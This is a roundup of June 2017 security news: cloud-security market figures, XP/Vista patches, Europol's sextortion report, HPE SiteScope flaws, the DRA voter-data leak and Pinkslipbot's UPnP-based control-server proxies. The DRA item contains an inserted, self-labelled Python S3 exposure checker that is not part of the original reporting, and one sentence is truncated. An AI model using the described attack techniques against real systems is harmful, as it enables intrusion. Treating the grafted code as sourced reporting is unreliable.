19.6.2017 SecurityWorld Security
The cloud security services segment will continue to grow at a rapid pace: according to Gartner, it will reach a total of $5.9 billion in 2017, 21% more than in 2016.
Overall, the cloud security services segment will grow faster than the information security market as a whole. Gartner analysts estimate that the global market for cloud security services will grow to almost $9 billion by 2020 (see table).

SIEM (Security Information and Event Management), IAM (Identity and Access Management) and emerging technologies are the fastest-growing segments of cloud security services

“Email security, web security and IAM remain the three main cloud priorities for companies,” says Ruggero Contu, research director at Gartner.

Services that secure these priorities, including SIEM solutions, and other new types of services have the greatest potential for growth. These emerging and fast-growing services include threat intelligence enablement, cloud-based malware sandboxing, cloud data encryption, endpoint protection management, threat intelligence, and web application firewalls (WAF).

Cloud security services

Market forecast (millions of US dollars)

Segment                            2016      2017      2018      2019      2020
Secure email gateways             654.9     702.7     752.3     811.5     873.2
Secure web gateways               635.9     707.8     786.0     873.2     970.8
IAM, IDaaS, user authentication 1,650.0   2,100.0   2,550.0   3,000.0   3,421.8
Remote vulnerability assessment   220.5     250.0     280.0     310.0     340.0
SIEM                              286.8     359.0     430.0     512.1     606.7
Application security testing      341.0     397.3     455.5     514.0     571.1
Other cloud security services   1,051.0   1,334.0   1,609.0   1,788.0   2,140.0
Total                           4,840.1   5,850.8   6,862.9   7,808.8   8,923.6

IDaaS = identity and access management as a service


Dangerous flaws threaten users of Windows XP and Vista

19.6.2017 Novinky/Bezpečnost Vulnerabilities
This year Microsoft ended support for the Windows Vista operating system, as it did years ago for the popular XP. Updates were therefore no longer supposed to be released for either system. Because of newly discovered dangerous flaws, however, the American software giant decided to make an exception and the fixes “The new Windows updates fix a security vulnerability that allows a remote attacker to execute arbitrary code on the target computer,” warned Pavel Bašta, an analyst at the National Security Team CSIRT.CZ.

In other words, cybercriminals can smuggle practically any virus onto the attacked machine. The user need not know about it at all.

The severity of the newly discovered holes is probably one of the main reasons why the American software giant decided to release updates even for systems that are no longer supported. Besides Windows XP, this also concerns Vista, whose support ended this April.

Incidentally, Microsoft already released an update for Windows XP this May. That was because of the malicious code WannaCry, which began to spread across the internet literally like an avalanche. In just a few days it infected over 300,000 computers in more than 150 countries.

Given the possible risks, users should not delay installing the updates. The fixes can be downloaded via the Windows Update service, which is part of the Windows operating system.

Support ended, the system did not
The end of support from Microsoft does not mean the operating system stops working from one day to the next. With a bit of exaggeration, one can say that Windows XP and Vista are immortal. If users want, they can keep running on computers for decades to come.

Microsoft has not restricted functionality in any way; everything works as it did before the end of support. The problem, however, is the absence of security patches. The risk of infection by a computer virus is, for example, up to six times higher on XP than on Windows 8, and many times higher still than on the currently offered Windows 10.

From a security standpoint, the appropriate solution is to move to a newer system. Users do not have to choose only from the Windows stable; a number of free alternatives are also available.


Europol Calls for Action Against Sextortion

19.6.2017 securityweek Crime
Online sextortion against children is extensive, under-reported, poorly understood, and growing. In response, Europol has simultaneously published a report with recommendations on how to tackle the problem, and launched a 'Say No' awareness campaign.

"Children are increasingly using the online environment to communicate and form relationships and this should be considered as a natural part of their development," explains Steven Wilson, head of Europol's European Cybercrime Centre. "However, it is our collective responsibility to educate them on the threats they may experience and also protect them to make the online environment as safe as possible. Where something untoward happens online we should provide clear and effective reporting and support mechanisms so they understand where to turn to for assistance."

The Say No campaign is launched in conjunction with a report (PDF) published Friday, which calls for awareness programs that differentiate between acceptable and unacceptable online communication to be included in school curricula. The difference between acceptable and unacceptable behavior (from a legal perspective as opposed to a moral perspective) is part of the problem.

The nature of the problem is also explored using information collected by the US National Center for Missing and Exploited Children's CyberTipline. It shows that female child victims are blackmailed for sexually explicit material far more often (84%) than their male counterparts (53%). The latter are more commonly targeted for financial gain (32%, compared to 2% for female child victims), which is a relatively new trend in online child sexual abuse. Another trend is the perpetrator's demand that the targeted child involve other children, such as siblings or peers.

Europol is calling for more academic research into the problem -- starting with a common international nomenclature. "One major limitation of the current capacity to assess the true nature of and successfully combat oSCEC is the lack of a common language and understanding of this phenomenon on the part of different stakeholders, such as legal and judicial systems, law enforcement and the private sector, including the media."

An immediate example is Europol's use of the term oSCEC (the online sexual coercion and extortion of children) for what the media and most people simply term, 'sextortion'. Another related example can be seen in Europe's use of the term 'child abuse' for what America normally calls 'child pornography'. Europol is concerned that the term 'sextortion' can imply "equivalence with the crime affecting adults, and may lead to a failure to recognize more complex and nuanced features of the crime affecting children and its grave consequences for them." A similar argument applies to the use of the term 'child pornography' (always illegal) and the often legal (adult) pornography.

The poor understanding of oSCEC is almost certainly supported by under-reporting by victims. Europol wants to tackle the former by increased research, including in terms of victim and perpetrator characteristics. For example, notes the report, "As the financial victimization of children is a comparatively new trend in online child sexual abuse and exploitation (CSAE) further empirical work is required to identify particular factors at play that render young people vulnerable to financial exploitation."

It wishes to tackle the latter by increased cooperation between stakeholders (including increased monitoring by platform providers), examining national laws to determine "whether the current legislation can cope with the complexities of oSCEC, whether it is complementary and whether it is sufficient to ensure appropriate prosecution;" and through the launch of the Europol 'Say No' campaign.

Part of the solution will come naturally from better understanding the problem. "The complex and dynamic nature of online unlawful behavior," says the report, "causes shortcomings in the recording of incidents of oSCEC which creates difficulties in assessing the scope of this crime threat."

But there is also a current lack of 'preventive intervention'. Europol's recommendation is for "effective, tailor-made awareness programs to make children and young people aware of acceptable and unacceptable online communication, including the illegality of some online practices, with a particular focus on those in the peer environment. Such programs should be included in school curricula."

The necessary research and the development of the programs that Europol recommends will take time, and in the meantime young children remain at risk. "Protecting our children is one of the highest priorities for law enforcement in Europe and across the world," comments Rob Wainwright, Europol's executive director. "At Europol, we are committed to tackle any threat to our children and bring anyone who harms them to justice."

Europol's Say No campaign aims to deliver immediate help to both existing and potential victims of oSCEC. Drawing on information from the UK NCA's CEOP Command education program, it helps young people to understand what is happening, to stop what is happening, and to report and get help for what has happened.


Workarounds Provided for HPE SiteScope Vulnerabilities

19.6.2017 securityweek Vulnerability
Several potentially serious vulnerabilities have been found in HPE SiteScope, and while patches are not available, users can apply workarounds to prevent attacks.

HPE SiteScope is an agentless performance and availability monitoring software for distributed IT infrastructures, including servers, network services, applications, and operating systems.

While conducting a security assessment, expert Richard Kelley identified several vulnerabilities in version 11.31.461 of the product.

Kelley noticed that a critical remote code execution vulnerability disclosed in 2012 and for which a Metasploit module is available still hasn’t been patched by HPE. The vendor noted that users can prevent attacks by setting a specific flag in the “groups/master.config” file to disable old APIs.

A Shodan search conducted by Kelley showed that there are at least 230 SiteScope servers accessible on the Internet.

“I wonder how many admins know about this setting, and why wouldn’t HPE just remove the old APIs from new versions if they are no longer needed?” the researcher said in a blog post.

The expert also discovered that credentials stored in configuration files are encrypted, but the encryption key is hardcoded, allowing an attacker to obtain the password needed to log in to the SiteScope interface with administrator privileges.

Once the attacker has access to the administration interface, they can obtain credentials for Linux and Windows servers monitored via SiteScope. While the admin interface only displays passwords as dots, the actual password is transmitted in clear text over an insecure connection to the client, allowing a man-in-the-middle (MitM) attacker to easily obtain the information.

Kelley also discovered the existence of a proprietary encryption scheme that uses a hardcoded private key. He determined that this function had still been used to encrypt some configuration data.

HPE said it plans on addressing the insecure transmission of credentials sometime in the third quarter. As for the encryption-related issues, the company pointed out that the problems are covered in chapter 20 of the SiteScope deployment guide.

While HPE has asked the researcher to delay disclosure until the third quarter, Kelley and CERT/CC have decided to make the flaws public to “encourage HPE to provide defender mitigations as soon as possible.”

CERT/CC has published an advisory containing mitigation advice for the unpatched vulnerability.

It’s not uncommon for HPE to provide workarounds for SiteScope vulnerabilities instead of releasing patches. In October 2015, Rapid7 disclosed the details of a command injection flaw that had also been addressed in the product documentation.


DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed
19.6.2017 securityaffairs Incident
The popular security expert Chris Vickery revealed the DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.
Researcher Chris Vickery has found nearly 200 million voter records in an unsecured Amazon S3 bucket maintained by Deep Root Analytics (DRA), it is the largest exposure of its kind in history.
The records include the voter’s first and last name, home and mailing address, date of birth, phone number, party affiliation, ethnicity, voter registration data, and a flag should the person appear on the federal Do-Not-Call registry.

The voter files also include other attributes that could have been used for analysis based on ethnicity and religion.

In 2015, Vickery discovered an archive exposed online containing 191 million voter records.

DRA is a Republican big data analytics firm, the popular expert discovered the huge trove of data on June 12, then he reported the issue to the authorities and the company secured it in two days.

The archive contains complete voter files compiled by DRA and at least two other contractors, Target Point Consulting Inc. and Data Trust.

Voter information is considered public, but even though it is freely available it is not always easy to access. In any case, the use of such data for commercial purposes is forbidden.

The archive discovered by Vickery on the DRA S3 bucket (“data_trust”) contains a collection of personal information representing between 150 and 198 million potential voters.

“Salted Hash has seen an example voter record, and many of the profile fields are similar to those from two years ago.” reported Salted Hash.

“Using an internal “RNC ID” – each voter in the database can be uniquely identified and associated with the logged data points.”

The archive discovered by Vickery contains information from the 2008 and 2012 elections, while the 2016 data are associated only with details on voters in Ohio and Florida.

Vickery also found another folder in the S3 bucket belonging to Target Point. The records included in the folder used the same “RNC ID” for each voter, but the update timestamps are recent (January 2017).

According to UpGuard’s Dan O’Sullivan, data discovered by the expert “provide a rare glimpse in to a systematic large-scale analytics operation.”

“The result is a database of frightening scope and intrusiveness into the modeled personal and political preferences of most of the country – adding up in total to an unsecured political treasure trove of data which was free to download online.”

Much of the Target Point data was post-election data; it included scores for potential voters on specific topics.

“For example, one 50 GB file contained scores for potential voters, signifying their potential to support a given policy, such as President Trump’s foreign policy stance of “America First”, or how concerned they’ll be with auto manufacturing as an issue.” states Salted Hash.

The discovery highlights the risks for organizations in using cloud storage without implementing necessary security policies.

Amazon offers several tools and the guidance to secure the infrastructure of its customers, but evidently it is not enough.
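The check an operator should run before data like this lands in a bucket, as an added example that is not code from UpGuard, DRA or the article: it inspects a bucket's ACL and bucket policy for anonymous access, using the JSON shapes the AWS GetBucketAcl and GetBucketPolicy calls return, with a constructed bucket name, owner ID and account number.

```python
"""Added example, not code from UpGuard, DRA or the article: checks an S3
bucket's ACL and bucket policy for the anonymous access that turns a bucket
into a public download. Inputs follow the JSON shapes the AWS GetBucketAcl
and GetBucketPolicy calls return; the bucket name, owner ID and account
number below are constructed placeholders."""
import json

# AWS's predefined group URIs for "everyone" and "any AWS account holder";
# a grant to either one makes the bucket readable without a password.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone on the Internet",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}


def public_acl_grants(acl: dict) -> list:
    """(who, permission) for every ACL grant made to a public group."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            hits.append((PUBLIC_GROUPS[grantee["URI"]], grant.get("Permission")))
    return hits


def _wildcard_principal(principal) -> bool:
    """True for Principal "*" or {"AWS": "*"} (also when given inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in ([aws] if isinstance(aws, str) else aws)
    return False


def public_policy_statements(policy_json: str) -> list:
    """(Sid, actions) for Allow statements open to any principal with no Condition."""
    statements = json.loads(policy_json).get("Statement", [])
    if isinstance(statements, dict):          # a policy may carry a single statement
        statements = [statements]
    hits = []
    for st in statements:
        if st.get("Effect") != "Allow" or not _wildcard_principal(st.get("Principal")):
            continue
        if st.get("Condition"):               # conditional grants need a human look; not flagged here
            continue
        actions = st.get("Action", [])
        hits.append((st.get("Sid", "<no Sid>"), [actions] if isinstance(actions, str) else actions))
    return hits


def bucket_exposure(acl: dict, policy_json=None) -> dict:
    """Combine both checks; 'public' is True if either path grants anonymous access."""
    acl_hits = public_acl_grants(acl)
    policy_hits = public_policy_statements(policy_json) if policy_json else []
    return {"acl": acl_hits, "policy": policy_hits, "public": bool(acl_hits or policy_hits)}


# Constructed sample: an ACL that lets everyone list the bucket and a policy
# that lets anyone fetch objects, i.e. the "unsecured bucket" pattern.
SAMPLE_ACL = {
    "Owner": {"ID": "EXAMPLE-OWNER-ID"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-ID"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-voter-bucket/*"},
        {"Sid": "OwnerOnly", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-voter-bucket/*"},
    ],
})
# The hardened counterpart: owner-only ACL and no public policy statement.
HARDENED_ACL = {"Owner": {"ID": "EXAMPLE-OWNER-ID"}, "Grants": [SAMPLE_ACL["Grants"][0]]}

if __name__ == "__main__":
    print(bucket_exposure(SAMPLE_ACL, SAMPLE_POLICY))
    print(bucket_exposure(HARDENED_ACL, None))
```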

Chris Vickery has discovered many other notable cases of open databases exposed on the Internet. In December 2015 the security expert discovered 191 million records belonging to US voters online; in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

In March, he announced a 1.37 billion records data leak.


Pinkslipbot banking Trojan exploiting infected machines as control servers
19.6.2017 securityaffairs Virus
Pinkslipbot is a banking Trojan that uses a complicated multistage proxy for HTTPS-based control server communication.
Security researchers at McAfee Labs have spotted a new strain of the Pinkslipbot banking malware (also known as QakBot/QBot) that leverages UPnP to open ports, allowing incoming connections from anyone on the Internet to communicate with the infected machine even if they are behind a network address translation router.

“To do so, Pinkslipbot uses universal plug and play (UPnP) to open ports, allowing incoming connections from anyone on the Internet to communicate with the infected machine. As far as we know, Pinkslipbot is the first malware to use infected machines as HTTPS-based control servers and the second executable-based malware to use UPnP for port forwarding after the infamous W32/Conficker worm in 2008.” states the analysis shared by Mcafee.

Pinkslipbot, aka Qbot, first appeared in 2009, when it was detected by Symantec; recent variants implement new features, including an advanced evasion technique.

Qbot is a data-stealing worm with backdoor capabilities, used to recruit infected machines into a credential-harvesting botnet.

Experts noticed that Pinkslipbot uses UPnP to provide the path to its targets: new infections contact HTTPS servers at the IP addresses listed in the malware. These machines serve as HTTPS proxies that forward traffic to an additional layer of HTTPS proxies, a technique that masks the IP address of the real C&C server.

“We have discovered that the list of IP addresses consists solely of infected machines that serve as HTTPS-based proxies to the actual control servers. This setup (shown in the following diagram) is used to mask the real IP addresses of the Pinkslipbot control servers.” states the analysis.

Pinkslipbot malware

The malware checks the target’s connection using a Comcast Internet speed tester; the test is only possible from US IP addresses. If the target passes the speed test, the malware then probes UPnP to check the available services. The malicious code checks 27 ports to see if it can map them to the outside world.

The exact procedure for determining whether an infected machine is eligible to be a control server proxy is still unclear.

“Malware researchers believe the choice depends on an infected machine’s satisfying a combination of three factors.

IP address located in North America
High-speed Internet connection
Capability to open ports on an Internet gateway device using UPnP”
Once available ports have been found, the malware on the infected machine behind the firewall establishes a permanent port mapping to route the traffic and works as a C&C proxy.

Infected machines at the first proxy level use the libcurl library to pass information to the second layer, which then routes the traffic to the “real” C&C servers.

“Once the infected machine receives a control server request from a new Pinkslipbot infection, it routes all traffic to the real control servers via an additional proxy using the popular libcurl URL transfer library,” continues the analysis.

To prevent Pinkslipbot infection users should “keep tabs on their local port-forwarding rules” and should turn UPnP off if they don’t need it.